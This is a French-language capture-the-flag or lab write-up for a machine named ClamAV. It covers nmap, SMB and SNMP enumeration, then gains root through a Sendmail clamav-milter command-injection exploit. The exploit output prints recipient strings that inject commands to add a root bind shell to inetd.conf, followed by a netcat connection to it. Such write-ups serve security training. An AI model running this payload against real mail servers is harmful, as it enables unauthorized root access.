ClamAV

enumération smtp snmp

Nom machine : ClamAV
Difficulté : Facile
OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 11:34 EDT
Nmap scan report for 192.168.233.42
Host is up (0.029s latency).
Not shown: 65395 closed tcp ports (conn-refused), 133 filtered tcp ports (no-response)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.176], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp    open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-title: Ph33r
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
| http-methods: 
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp   open  smux        Linux SNMP multiplexer
445/tcp   open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.14a-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-08-18T15:35:19-04:00
|_clock-skew: mean: 5h59m59s, deviation: 2h49m43s, median: 3h59m58s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

HTTP (80)

ifyoudontpwnmeuran00b

SMB (139/445)

┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.233.42 

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 192.168.233.42:445	Name: 192.168.233.42      	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	IPC$                                              	NO ACCESS	IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
	ADMIN$                                            	NO ACCESS	IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)

Smux (199) : Linux SNMP multiplexer

Le port 161:UDP est également ouvert

┌──(kali㉿kali)-[~]
└─$ snmpwalk -v 2c -c public 192.168.233.42 | grep STRING 
iso.3.6.1.2.1.1.1.0 = STRING: "Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686"
iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)"
iso.3.6.1.2.1.1.5.0 = STRING: "0xbabe.local"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (configure /etc/snmp/snmpd.local.conf)"
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB module to describe generic objects for network interface sub-layers"
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.2.2.1.2.1 = STRING: "lo"
iso.3.6.1.2.1.2.2.1.2.2 = STRING: "eth0"
iso.3.6.1.2.1.2.2.1.2.3 = STRING: "sit0"
iso.3.6.1.2.1.2.2.1.6.2 = Hex-STRING: 00 50 56 9E 5F 5A 
iso.3.6.1.2.1.2.2.1.6.3 = Hex-STRING: 00 00 00 00 5F 5A 
iso.3.6.1.2.1.3.1.1.2.2.1.192.168.233.254 = Hex-STRING: 00 50 56 9E B9 D1 
iso.3.6.1.2.1.4.22.1.2.2.192.168.233.254 = Hex-STRING: 00 50 56 9E B9 D1 
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 08 12 0F 32 38 00 2D 04 00 
iso.3.6.1.2.1.25.1.4.0 = STRING: "root=/dev/sda1 ro 
Timeout: No Response from 192.168.233.42
iso.3.6.1.2.1.25.2.3.1.3.2 = STRING: "Real Memory"
iso.3.6.1.2.1.25.2.3.1.3.3 = STRING: "Swap Space"
iso.3.6.1.2.1.25.2.3.1.3.4 = STRING: "/"
iso.3.6.1.2.1.25.2.3.1.3.5 = STRING: "/sys"

Nous avons un nom de domaine, nous l'ajoutons dans /etc/hosts puis cherchons des sous-domaines : sans résultat.

┌──(kali㉿kali)-[~/oscp/clamav]
└─$ snmp-check 192.168.233.42
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.233.42:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 192.168.233.42
  Hostname                      : 0xbabe.local
  Description                   : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
  Contact                       : Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)
  Location                      : Unknown (configure /etc/snmp/snmpd.local.conf)
  Uptime snmp                   : 01:10:10.80
  Uptime system                 : 01:09:33.70
  System date                   : 2024-8-18 16:42:30.0

{...}
3771                  runnable              klogd                 /sbin/klogd                               
  3775                  runnable              clamd                 /usr/local/sbin/clamd                      
  3778                  runnable              clamav-milter         /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
  3791                  runnable              nmbd                  /usr/sbin/nmbd        -D    
{...}

SMTP (25)

Nous énumérons les users, et nous n'avons que root. en revanche la version de clamAV nous intéresse... Elle est vulnérable !

Sendmail with clamav-milter < 0.91.2 - Remote Command ExecutionExploit Database

Accès initial

┌──(kali㉿kali)-[~/oscp/clamav]
└─$ perl exploit.py 0xbabe.local  
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 0xbabe.local...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sun, 18 Aug 2024 16:33:38 -0400; (No UCE/UBE) logging access from: [192.168.45.176](FAIL)-[192.168.45.176]
250-localhost.localdomain Hello [192.168.45.176], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 47IKXc5Q004630 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

L'exploit fonctionne ! Nous n'avons plus qu'à nous connecter au port que nous venons d'ouvrir...

┌──(kali㉿kali)-[~]
└─$ nc 192.168.233.42 31337
whoami
root

Nous sommes root !

PrécédentBratarina SuivantClue

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (80)

hashtagSMB (139/445)

hashtagSmux (199) : Linux SNMP multiplexer

hashtagSMTP (25)

hashtagAccès initial